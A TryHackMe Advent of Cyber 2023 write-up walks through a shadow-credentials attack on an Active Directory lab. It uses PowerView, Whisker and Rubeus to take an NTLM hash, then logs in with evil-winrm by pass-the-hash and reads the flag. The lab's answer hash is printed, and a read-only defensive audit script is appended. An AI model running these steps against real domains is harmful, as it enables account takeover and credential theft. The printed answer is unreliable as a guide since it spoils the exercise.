Advent of Cyber 2023 — Day 11 Writeup with Answers by Karthikeyan Nagaraj | TryHackMe
2023-12-19 01:05:50 Author: infosecwriteups.com

TryHackMe — Active Directory [ Jingle Bells, Shadow Spells ] — While the South Pole Centre’s team has displayed remarkable expertise, their small size means they haven’t placed a strong emphasis on cyber security. With the merger ongoing and the integration of the two infrastructure systems progressing, vulnerabilities begin to surface.

Karthikeyan Nagaraj

InfoSec Write-ups

AntarctiCrafts’ technology stack was very specialised. It was primarily focused on cutting-edge climate research rather than prioritising robust cyber security measures.

As the integration of the two infrastructure systems progresses, vulnerabilities begin to surface. While AntarctiCrafts’ team displays remarkable expertise, their small size means they need to emphasise cyber security awareness.

Throughout the room, you’ll see that some users have too many permissions. We addressed most of these instances in the previous audit, but is everything now sorted out from the perspective of the HR user?

Active Directory (AD) is a system mainly used by businesses in Windows environments. It’s a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

You can think of AD as a digital database containing objects like users, groups, and computers, each with specific attributes and permissions. Ideally, it applies the principle of least privilege and uses a hierarchical approach to managing roles and giving authenticated users access to all non-sensitive data throughout the system. For this reason, assigning permissions to users must be approached cautiously, as it can potentially compromise the entire Active Directory. We’ll delve into this in the upcoming exploitation section.

Think Passwords Are Hard To Remember — Say Hello to WHfB

Microsoft introduced Windows Hello for Business (WHfB) as a modern and secure way to replace conventional password-based authentication. Instead of relying on traditional passwords, WHfB uses cryptographic keys for user verification. Users on the Active Directory domain can access AD with a PIN or biometrics bound to a pair of cryptographic keys, one public and one private, which prove the identity of the entity they belong to. msDS-KeyCredentialLink is the attribute in which the Domain Controller stores the WHfB public key when a new user device (such as a computer) is enrolled. In short, each user object in the Active Directory database holds its public key in this one attribute, so anyone who can write that attribute on a user object can register a key for that user.

  1. Start the TryHackMe VPN or the AttackBox.
  2. Start the machine and click Split View.

1. What is the hash of the vulnerable user?

Use the commands below one by one:

1. The first command moves to the folder containing the exploitation tools.

2. The second command bypasses the default execution policy so that arbitrary PowerShell scripts can run.

3. The third command loads the PowerView script into memory; the fourth then lists the ACL entries in which the hr user holds rights over other domain objects.

cd Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

4. The output reveals the vulnerable user: vansprinkles.

5. Now execute the command below:

.\Whisker.exe add /target:vansprinkles

6. Copy the Rubeus.exe command that Whisker prints and run it in the same shell.

7. The output contains the NTLM hash.

Ans: 03E805D8A8C5AA435FB48832DAD620E3
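As an added defensive check for this room (my own script, not part of the original write-up and not PowerView or Whisker code), the PowerShell below audits the same misconfiguration from the administrator's side: it lists every non-administrative principal that could write msDS-KeyCredentialLink on another user's object, and flags users that already have a key linked. It assumes the RSAT ActiveDirectory module, a Windows Server 2016 or later schema (so the attribute exists), and an account with read access to the domain.

```powershell
# Added audit script (not part of the original room or tool set). Read-only: it changes nothing.
# Assumes the RSAT ActiveDirectory module and a schema that defines msDS-KeyCredentialLink.
Import-Module ActiveDirectory

# Resolve the schema GUID of msDS-KeyCredentialLink at run time rather than hardcoding it.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$kclGuid  = [guid](Get-ADObject -SearchBase $schemaNC `
    -LDAPFilter '(lDAPDisplayName=msDS-KeyCredentialLink)' `
    -Properties schemaIDGUID).schemaIDGUID

# Principals expected to hold write rights over user objects; anything else is reported.
$expected = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators',
              'Domain Admins', 'Enterprise Admins', 'Key Admins', 'Enterprise Key Admins',
              'Account Operators')

$findings = foreach ($user in Get-ADUser -Filter * -Properties 'msDS-KeyCredentialLink') {
    # A populated attribute means a device key (WHfB enrolment or otherwise) is already linked.
    $hasKey = ($user.'msDS-KeyCredentialLink').Count -gt 0
    $acl = Get-Acl -Path ("AD:\" + $user.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($expected | Where-Object { $who -like "*$_" }) { continue }
        $rights = $ace.ActiveDirectoryRights
        # Broad rights (what the write-up found granted to hr) or WriteProperty scoped to this
        # attribute (an empty ObjectType GUID means every property) both allow adding a key.
        $broad   = $rights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner'
        $thisAtt = ($rights -match 'WriteProperty') -and
                   ($ace.ObjectType -eq $kclGuid -or $ace.ObjectType -eq [guid]::Empty)
        if (-not ($broad -or $thisAtt)) { continue }
        [pscustomobject]@{
            Target    = $user.SamAccountName
            Principal = $who
            Rights    = $rights.ToString()
            Inherited = $ace.IsInherited
            KeyLinked = $hasKey
        }
    }
}

$findings | Sort-Object Target, Principal | Format-Table -AutoSize
```

Any row whose Principal is an ordinary account, as hr was here, is an ACL to tighten; a KeyLinked user that was never enrolled in WHfB is worth inspecting too.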

2. What is the content of flag.txt on the Administrator Desktop?

  1. Open a terminal on your AttackBox or on a machine connected to the TryHackMe VPN.
  2. Paste the command below to use Evil-WinRM, a tool for remotely managing Windows systems over the Windows Remote Management (WinRM) protocol, authenticating with the NTLM hash instead of a password:
    evil-winrm -i THM-MACHINE-IP -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3
  3. Now change the directory to the Administrator’s desktop:
    cd C:\Users\Administrator\Desktop
  4. Run dir to list the files, then print the flag with:
    type flag.txt

Use your skills to find the answer to this question.

If you are unable to find it, use the video below to find the answer.


Source: https://infosecwriteups.com/advent-of-cyber-2023-day-11-writeup-with-answers-by-karthikeyan-nagaraj-tryhackme-21067ad0903e?source=rss----7b722bfd1b8d---4